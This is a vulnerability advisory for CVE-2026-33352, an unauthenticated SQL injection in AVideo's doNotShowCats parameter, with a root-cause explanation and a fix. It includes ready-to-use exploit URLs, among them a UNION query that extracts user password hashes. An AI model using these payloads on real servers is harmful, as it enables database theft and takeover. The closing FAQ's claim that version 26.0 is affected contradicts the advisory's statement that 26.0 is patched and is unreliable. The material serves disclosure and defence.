CVE-2026-33352: AVideo has an Unauthenticated SQL Injection via `doNotShowCats` Parameter (Backslash Escape Bypass)
Summary
An unauthenticated SQL injection vulnerability exists in objects/category.php in the getAllCategories() method. The doNotShowCats request parameter is sanitized only by stripping single-quote characters (strreplace("'", '', ...)), but this is trivially bypassed using a backslash escape technique to shift SQL string boundaries. The parameter is not covered by any of the application's global input filters in objects/security.php.
Affected Component
File: objects/category.php, lines 386-394, inside method getAllCategories()
php if (!empty($REQUEST['doNotShowCats'])) { $doNotShowCats = $REQUEST['doNotShowCats']; if (!isarray($REQUEST['doNotShowCats'])) { $doNotShowCats = array($REQUEST['doNotShowCats']); } foreach ($doNotShowCats as $key => $value) { $doNotShowCats[$key] = strreplace("'", '', $value); // INSUFFICIENT } $sql .= " AND (c.cleanname NOT IN ('" . implode("', '", $doNotShowCats) . "') )"; }
Root Cause
1. Incomplete sanitization: The only defense is strreplace("'", '', $value), which strips single-quote characters. It does not strip backslashes (\). 2. No global filter coverage: The doNotShowCats parameter is absent from every filter list in objects/security.php ($securityFilter, $securityFilterInt, $securityRemoveSingleQuotes, $securityRemoveNonChars, $securityRemoveNonCharsStrict, $filterURL, and the id suffix pattern). 3. Direct string concatenation into SQL: The filtered values are concatenated into the SQL query via implode() instead of using parameterized queries.
Exploitation
MySQL, by default, treats the backslash (\) as an escape character inside string literals (unless NOBACKSLASHESCAPES SQL mode is enabled, which is uncommon). This allows a backslash in one array element to escape the closing single-quote that implode() adds, shifting the string boundary and turning the next array element into executable SQL.
Step-by-step:
1. The attacker sends: GET /categories.json.php?doNotShowCats[0]=\&doNotShowCats[1]=)%20OR%201=1)--%20-
2. After strreplace("'", '', ...), values are unchanged (no single quotes to strip): - Element 0: \ - Element 1: ) OR 1=1)-- -
3. After implode("', '", ...), the concatenated string is: \', ') OR 1=1)-- -
4. The full SQL becomes: sql AND (c.cleanname NOT IN ('\', ') OR 1=1)-- -') )
5. MySQL parses this as: - '\' — the \ escapes the next ', making it a literal quote character inside the string. The string continues. - , ' — the comma and space are part of the string. The next ' (which was the opening quote of element 1) closes the string. - String value = ', (three characters: quote, comma, space) - ) OR 1=1) — executable SQL. The first ) closes NOT IN (, the second ) closes the outer AND (. - -- - — SQL comment, discards the remainder ') )
Effective SQL: sql AND (c.cleanname NOT IN (', ') OR 1=1) This always evaluates to TRUE.
For data extraction (UNION-based):
GET /categories.json.php?doNotShowCats[0]=\&doNotShowCats[1]=))%20UNION%20SELECT%201,user,password,4,5,6,7,8,9,10,11,12,13,14%20FROM%20users--%20-
Produces: sql AND (c.cleanname NOT IN ('\', ')) UNION SELECT 1,user,password,4,5,6,7,8,9,10,11,12,13,14 FROM users-- -') )
This appends a UNION query that extracts usernames and password hashes from the users table. The attacker must match the column count of the original SELECT (determinable through iterative probing).
Impact
- Confidentiality: Full read access to the entire database, including user credentials, emails, private video metadata, API secrets, and plugin configuration. - Integrity: Ability to modify or delete any data in the database via stacked queries or subqueries (e.g., UPDATE users SET isAdmin=1). - Availability: Ability to drop tables or corrupt data. - Potential RCE: On MySQL configurations that allow SELECT ... INTO OUTFILE, the attacker could write a PHP web shell to the server's document root.
Suggested Fix
Replace the string concatenation with parameterized queries:
php if (!empty($REQUEST['doNotShowCats'])) { $doNotShowCats = $REQUEST['doNotShowCats']; if (!isarray($doNotShowCats)) { $doNotShowCats = array($doNotShowCats); } $placeholders = arrayfill(0, count($doNotShowCats), '?'); $formats = strrepeat('s', count($doNotShowCats)); $sql .= " AND (c.cleanname NOT IN (" . implode(',', $placeholders) . ") )"; // Pass $formats and $doNotShowCats to sqlDAL::readSql() as bind parameters }
Alternatively, use $global['mysqli']->realescapestring() on each value as a minimum fix, though parameterized queries are strongly preferred.
Other sources
WWBN AVideo is an open source video platform. Prior to version 26.0, an unauthenticated SQL injection vulnerability exists in objects/category.php in the getAllCategories() method. The doNotShowCats request parameter is sanitized only by stripping single-quote characters (strreplace("'", '', ...)), but this is trivially bypassed using a backslash escape technique to shift SQL string boundaries. The parameter is not covered by any of the application's global input filters in objects/security.php. Version 26.0 contains a patch for the issue.
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Frequently Asked Questions
What is the severity of CVE-2026-33352?
CVE-2026-33352 is considered a high severity vulnerability due to its potential for unauthenticated SQL injection.
How do I fix CVE-2026-33352?
To mitigate CVE-2026-33352, ensure that the `doNotShowCats` parameter is properly sanitized using prepared statements or an ORM.
What software is affected by CVE-2026-33352?
CVE-2026-33352 affects the `wwbn/avideo` package version 26.0 and below.
Could CVE-2026-33352 lead to data breaches?
Yes, exploitation of CVE-2026-33352 could allow attackers to perform unauthorized database queries, potentially accessing sensitive data.
Is user authentication needed to exploit CVE-2026-33352?
No, CVE-2026-33352 can be exploited without user authentication, making it particularly critical.